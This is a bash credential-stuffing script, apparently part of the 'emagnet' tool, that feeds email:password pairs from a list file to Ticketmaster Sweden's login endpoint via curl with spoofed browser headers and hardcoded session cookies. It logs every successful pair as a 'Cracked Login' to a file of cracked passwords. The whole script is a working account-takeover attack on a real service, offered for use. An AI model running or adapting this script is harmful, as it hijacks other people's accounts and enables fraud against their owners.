#!/bin/bash
################################################################################
################################################################################
####                                                                       #####
#### A notice to all nerds.                                                #####
#### If you will copy developers real work it will not make you a hacker.  #####
#### Resepect all developers, we doing this because it's fun!              #####
####                                                                       #####
################################################################################
################################ SOURCE CODE ###################################
################################################################################
####  Copyright (C) 2018-2019, wuseman                                     #####
####                                                                       #####
####  This program is free software; you can redistribute it and/or modify #####
####  it under the terms of the GNU General Public License as published by #####
####  the Free Software Foundation; either version 2 of the License, or    #####
####  (at your option) any later version.                                  #####
####                                                                       #####
####  This program is distributed in the hope that it will be useful,      #####
####  but WITHOUT ANY WARRANTY; without even the implied warranty of       #####
####  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the        #####
####  GNU General Public License for more details.                         #####
####                                                                       #####
####  You must obey the GNU General Public License. If you will modify     #####
####  emagnet file(s), you may extend this exception to your version       #####
####  of the file(s), but you are not obligated to do so.  If you do not   #####
####  wish to do so, delete this exception statement from your version.    #####
####  If you delete this exception statement from all source files in the  #####
####  program, then also delete it here.                                   #####
####                                                                       #####
####  Contact:                                                             #####
####          IRC: Freenode @ wuseman                                      #####
####          Mail: wuseman <wuseman@nr1.nu>                               #####
####                                                                       #####
################################################################################

if [[ ! -d /root/cracked-accounts ]]; then
   mkdir -p /root/cracked-accounts
fi

while read line; do
    MAIL="$(echo $line|awk -F'@' '{print $1}')"
    MAILHOST="$(echo $line|awk -F'@' '{print $2}'|cut -d: -f1)"
    PASSWORD="$(echo $line|awk -F':' '{print $2}')"

curl -s 'https://www.ticketmaster.se/myAccount/controller/login.php' \
    -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0' \
    -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \
    -H 'Accept-Language: sv-SE,en;q=0.7,en-US;q=0.3' --compressed \
    -H 'Content-Type: application/x-www-form-urlencoded' \
    -H 'Origin: https://www.ticketmaster.se' \
    -H 'Connection: keep-alive' \
    -H 'Referer: https://www.ticketmaster.se/myAccount/loginRegister.php' \
    -H 'Cookie: NDMA=612; BID=6aa5ffbc25464cd89b5dde4a; SID=8067ba28a4bc402aaa49946f; uniqueid=c733a75.59772f4f05f44; cluster=eu_west_1; PHPSESSID=01d6e53ecd3e75ed1cdd4a364e9cca6b; SESSID=01d6e53ecd3e75ed1cdd4a364e9cca6b; language=sv-se; TMSID=QO%ED%AE9%1BL%95%DE%08%7D%2F%9E%9C%C1K%25%CC%1C%8E%CF%EA%A03%ECE%1E%D7%5C%104%24; sticky=ACDD' \
    -H 'Upgrade-Insecure-Requests: 1' \
    -H 'DNT: 1' \
    -H 'Pragma: no-cache' \
    -H 'Cache-Control: no-cache' \
    -H 'TE: Trailers' \
    --data "EMAIL=$MAIL%40$MAILHOST&PASSWORD=$PASSWORD"|grep -q upcomingEvents

if [[ $? -eq "0" ]]; then
    echo -e "[\e[1;32m>>\e[0m] - Cracked Login: $line" | tee ~/cracked-ticketmaster-passwords.txt
else
    echo -e "[\e[1;31m<<\e[0m] - Failed Login $line"
fi
done < $1
